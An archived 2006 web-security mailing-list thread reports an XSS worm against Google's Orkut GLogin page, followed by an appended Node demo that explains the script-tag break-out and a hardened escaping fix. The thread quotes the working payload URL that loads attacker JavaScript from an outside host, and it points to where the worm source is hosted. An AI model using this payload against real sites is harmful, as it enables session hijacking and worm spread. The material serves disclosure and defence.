[WEB SECURITY] XSS worm attacking Google?

Kuai Hinojosa kuai.hinojosa at gmail.com
Sat Dec 9 23:03:50 EST 2006


That is not Spanish, that is Portuguese.  Thanks for sharing this information,
Billy.

On 12/9/06, pdp (architect) <pdp.gnucitizen at googlemail.com> wrote:
>
> Nice find. It seems that it is written by someone who speaks Spanish.
> There was a discussion on sla.ckers.org about a vulnerability in orkut,
> I think... or was that somewhere else. Anyway, it is funny that
> attackers came up with this worm so quickly, since that is only a
> two-week-old finding. It seems that the bad guys are starting to realise
> the power of XSS worms and their destructive potential. This is not
> good news!
>
> On 12/9/06, Billy Hoffman <Billy.Hoffman at spidynamics.com> wrote:
> > Folks,
> >
> > I was running through some proxy logs, and saw a reference to
> > http://sb.google.com/safebrowsing/update
> >
> > Requesting it redirected me to a blacklist of what look like phishing
> > sites. However, all the way at the bottom was a reference to Google's
> > Orkut site. Specifically, the blacklist entry was for a GET-based XSS
> > attack against Google's GLogin system.
> >
> > https://www.orkut.com/GLogin.aspx?done=http://www.orkut.com/Scrapbook.aspx?na=\";};//--></script><script%20src=\'http://www.probranco.net/xmen.js\'></script><!--
> >
> > If you request that URL, you get a 403 error page saying your query is
> > from an automated attack. Looks very similar to a page Google returned
> > during the Perl.Santy attack a year or so back.
> >
> > The JavaScript source code to the attack is still available at
> > http://www.probranco.net/xmen.js
> >
> > Enjoy,
> > Billy Hoffman
> > --
> > Lead Researcher, SPI Labs
> > SPI Dynamics Inc. - http://www.spidynamics.com
> > Phone:  678-781-4800
> > Direct: 678-781-4845
> >
> >
> >
> > ----------------------------------------------------------------------------
> > The Web Security Mailing List:
> > http://www.webappsec.org/lists/websecurity/
> >
> > The Web Security Mailing List Archives:
> > http://www.webappsec.org/lists/websecurity/archive/
> > http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
> >
> >
>
>
> --
> pdp (architect) | petko d. petkov
> http://www.gnucitizen.org
>
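The break-out in the quoted GLogin URL, as an added example that is not part of the thread and not Orkut's or Google's code. The payload puts `";};//--></script>` in front of a remote `<script src=...>` because the HTML tokenizer ends a script element at the first `</script`, no matter how the server quoted the value for JavaScript. The demo below (runnable in Node) renders the `done` parameter into a `<script>` block the naive way and the hardened way, then models that tokenizer rule to show which page would load xmen.js. The page template, the function names and the same-site redirect rule are assumptions for illustration; the backslashes before the quotes in the blacklist entry are treated as escaping artifacts and dropped from the constructed payload.

```javascript
// Added demo of the <script>-context break-out in the GLogin URL quoted above.
// Hypothetical code: the page template, the function names and the redirect
// policy are assumptions for illustration, not Orkut's or Google's code.

// The "done" parameter from the blacklist entry, URL-decoded (%20 -> space).
// Constructed for this demo; the backslashes before the quotes in the entry
// are taken as escaping artifacts and dropped here (assumption).
const PAYLOAD =
  "http://www.orkut.com/Scrapbook.aspx?na=\";};//--></script>" +
  "<script src='http://www.probranco.net/xmen.js'></script><!--";

// Naive server-side rendering: drop the parameter into a JavaScript string
// after escaping backslashes and double quotes. That keeps the JavaScript
// string intact, but the HTML tokenizer never sees JavaScript quoting: the
// first "</script" ends the element wherever it appears.
function escapeJsStringNaive(s) {
  return s.replace(/\\/g, "\\\\").replace(/"/g, '\\"');
}
function renderLoginPageVulnerable(done) {
  return '<script type="text/javascript"><!--\n' +
    'var done = "' + escapeJsStringNaive(done) + '";\n' +
    'function go() { location.href = done; };\n' +
    '//--></script>\n';
}

// Hardened rendering: JSON-encode the value, then hex-escape every character
// that matters to the HTML tokenizer (plus the JS line terminators U+2028/9),
// so the literal "</script" cannot occur inside the block. JavaScript decodes
// "\u003c" back to "<", so the value is unchanged for the script itself.
function escapeForScriptBlock(s) {
  return JSON.stringify(s)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Redirect policy (assumption): only a same-site absolute path is accepted as
// the post-login target; anything else, including "//host" and full URLs,
// falls back to "/".
function isSafeRedirect(done) {
  return /^\/(?!\/)[A-Za-z0-9_\-./?=&%]*$/.test(done);
}
function renderLoginPageHardened(done) {
  const target = isSafeRedirect(done) ? done : "/";
  return '<script type="text/javascript">\n' +
    'var done = ' + escapeForScriptBlock(target) + ';\n' +
    'function go() { location.href = done; }\n' +
    '</script>\n';
}

// Minimal model of the relevant HTML tokenizer rule: a script element's
// content runs from the end of its start tag to the first "</script",
// case-insensitively, with no regard to JavaScript string syntax.
function scriptBodies(html) {
  const bodies = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script/gi;
  let m;
  while ((m = re.exec(html)) !== null) bodies.push(m[1]);
  return bodies;
}

// External script URLs a browser would fetch while parsing the page.
function externalScripts(html) {
  const urls = [];
  const re = /<script\b[^>]*?\bsrc\s*=\s*['"]?([^'"\s>]+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) urls.push(m[1]);
  return urls;
}

// Evaluate a rendered JavaScript string literal the way the browser would.
function decodeScriptLiteral(literal) {
  return new Function("return " + literal)();
}

// Stand-alone run: show what each rendering hands to the browser.
const vulnerable = renderLoginPageVulnerable(PAYLOAD);
const hardened = renderLoginPageHardened(PAYLOAD);
console.log("vulnerable page loads:", externalScripts(vulnerable)); // [ 'http://www.probranco.net/xmen.js' ]
console.log("script elements in vulnerable page:", scriptBodies(vulnerable).length); // 2
console.log("hardened page loads:", externalScripts(hardened)); // []
console.log("round trip ok:", decodeScriptLiteral(escapeForScriptBlock(PAYLOAD)) === PAYLOAD); // true
```

The naive renderer does escape the double quote, and the JavaScript string is still syntactically fine; the page is owned anyway because the tokenizer splits the element at `</script>` and then parses the attacker's `<script src=...>` as a real tag, while the trailing `<!--` swallows the leftover JavaScript until the template's own `-->`. Escaping `<`, `>` and `&` inside the JSON literal removes that break-out, and validating `done` as a same-site path closes the open-redirect side of the same parameter.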